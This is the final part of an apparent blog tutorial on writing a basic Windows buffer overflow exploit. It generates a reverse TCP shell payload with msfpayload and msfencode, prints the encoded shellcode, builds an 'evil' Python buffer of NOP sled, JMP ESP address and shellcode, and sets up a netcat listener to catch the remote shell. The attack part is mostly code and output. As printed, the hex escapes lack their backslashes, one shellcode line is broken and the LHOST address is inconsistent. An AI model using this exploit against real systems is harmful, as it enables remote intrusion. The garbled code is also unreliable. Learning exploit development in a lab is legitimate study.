Guide to Basic Exploit Writing (Part 3 – last)

Guide to Basic Exploit Writing by dearmo


==================================================
9. Generating the Shellcode

We will make use of msfpayload and msfencode to generate our shellcode. (If you want to create your own shellcode, you will need to know some C and assembly language, as well as how to use a linker and an assembler e.g. nasm. Again, that’s another story.)

Let’s use a reverse shell as our payload. Use the command below to see a summary.


Code

# msfpayload windows/shell_reverse_tcp S

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 8642
   Platform: Windows
       Arch: x86 
Needs Admin: No
 Total size: 314 
       Rank: Normal

Provided by: 
  vlad902 
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, none, process
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell





Now fill in LHOST as 192.168.7 (use the ip of your attacking machine), generate the payload in raw format and pipe it into msfencode. Also tell msfencode not to use x00, x0a or x0d during the encoding process, and to output the shellcode in C format. Note that the encoder may generate something slightly different each time it runs. Explore using EXITFUNC=thread etc if you want.


Code

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.7 R | msfencode -b 'x00x0ax0d' -t c
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

unsigned char buf[] =
"xbdxd1x13xa8xadxd9xeexd9x74x24xf4x5ax2bxc9xb1"
"x4fx31x6ax14x03x6ax14x83xc2x04x33xe6x54x45x3a"
"x09xa5x96x5cx83x40xa7x4exf7x01x9ax5ex73x47x17"
"x15xd1x7cxacx5bxfex73x05xd1xd8xbax96xd4xe4x11"
"x54x77x99x6bx89x57xa0xa3xdcx96xe5xdex2fxcaxbe"
"x95x82xfaxcbxe8x1exfbx1bx67x
1ex83x1exb8xebx39"
"x20xe9x44x36x6ax11xeex10x4bx20x23x43xb7x6bx48"
"xb7x43x6ax98x86xacx5cxe4x44x93x50xe9x95xd3x57"
"x12xe0x2fxa4xafxf2xebxd6x6bx77xeex71xffx2fxca"
"x80x2cxa9x99x8fx99xbexc6x93x1cx13x7dxafx95x92"
"x52x39xedxb0x76x61xb5xd9x2fxcfx18xe6x30xb7xc5"
"x42x3ax5ax11xf4x61x33xd6xcax99xc3x70x5dxe9xf1"
"xdfxf5x65xbaxa8xd3x72xbdx82xa3xedx40x2dxd3x24"
"x87x79x83x5ex2ex02x48x9fxcfxd7xdexcfx7fx88x9e"
"xbfx3fx78x76xaaxcfxa7x66xd5x05xdexa1x42x66x49"
"x2cx94x0ex88x2ex8bx92x05xc8xc1x3ax40x43x7exa2"
"xc9x1fx1fx2bxc4xb7xbcxbex83x47xcaxa2x1bx10x9b"
"x15x52xf4x31x0fxccxeaxcbxc9x37xaex17x2axb9x2f"
"xd5x16x9dx3fx23x96x99x6bxfbxc1x77xc5xbdxbbx39"
"xbfx17x17x90x57xe1x5bx23x21xeexb1xd5xcdx5fx6c"
"xa0xf2x50xf8x24x8bx8cx98xcbx46x15xa8x81xcax3c"
"x21x4cx9fx7cx2cx6fx4ax42x49xecx7ex3bxaexecx0b"
"x3exeaxaaxe0x32x63x5fx06xe0x84x4a";



==================================================
10. Putting it All Together

Replace the “evil” lines in exploit.py with the following:


Code

evil = "x90" * 230             # In this case, not too important what you place here.
evil += "xe1xfaxb8x76"      # Replace this with the address JMP ESP you found earlier, in litte-endian order
evil += "x90" * 48             # Place some NOPs in front of the shellcode. Impt that you place a small buffer here.
evil += ("xbdxd1x13xa8xadxd9xeexd9x74x24xf4x5ax2bxc9xb1"
"x4fx31x6ax14x03x6ax14x83xc2x04x33xe6x54x45x3a"
"x09xa5x96x5cx83x40xa7x4exf7x01x9ax5ex73x47x17"
"x15xd1x7cxacx5bxfex73x05xd1xd8xbax96xd4xe4x11"
"x54x77x99x6bx89x57xa0xa3xdcx96xe5xdex2fxcaxbe"
"x95x82xfaxcbxe8x1exfbx1bx67x1ex83x1exb8xebx39"
"x20xe9x44x36x6ax11xeex10x4bx20x23x43xb7x6bx48"
"xb7x43x6ax98x86xacx5cxe4x44x93x50xe9x95xd3x57"
"x12xe0x2fxa4xafxf2xebxd6x6bx77xeex71xffx2fxca"
"x80x2cxa9x99x8fx99xbexc6x93x1cx13x7dxafx95x92"
"x52x39xedxb0x76x61xb5xd9x2fxcfx18xe6x30xb7xc5"
"x42x3ax5ax11xf4x61x33xd6xcax99xc3x70x5dxe9xf1"
"xdfxf5x65xbaxa8xd3x72xbdx82xa3xedx40x2dxd3x24"
"x87x79x83x5ex2ex02x48x9fxcfxd7xdexcfx7fx88x9e"
"xbfx3fx78x76xaaxcfxa7x66xd5x05xdexa1x42x66x49"
"x2cx94x0ex88x2ex8bx92x05xc8xc1x3ax40x43x7exa2"
"xc9x1fx1fx2bxc4xb7xbcxbex83x47xcaxa2x1bx10x9b"
"x15x52xf4x31x0fxccxeaxcbxc9x37xaex17x2axb9x2f"
"xd5x16x9dx3fx23x96x99x6bxfbxc1x77xc5xbdxbbx39"
"xbfx17x17x90x57xe1x5bx23x21xeexb1xd5xcdx5fx6c"
"xa0xf2x50xf8x24x8bx8cx98xcbx46x15xa8x81xcax3c"
"x21x4cx9fx7cx2cx6fx4ax42x49xecx7ex3bxaexecx0b"
"x3exeaxaaxe0x32x63x5fx06xe0x84x4a")
evil += "x90" * (1000 - len(evil))



Before you run the exploit.py again, open up another terminal and set up a netcat listener at port 4444:

Code

# nc -vlp4444




Now run exploit.py. You should be able to get a shell on your netcat listener.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s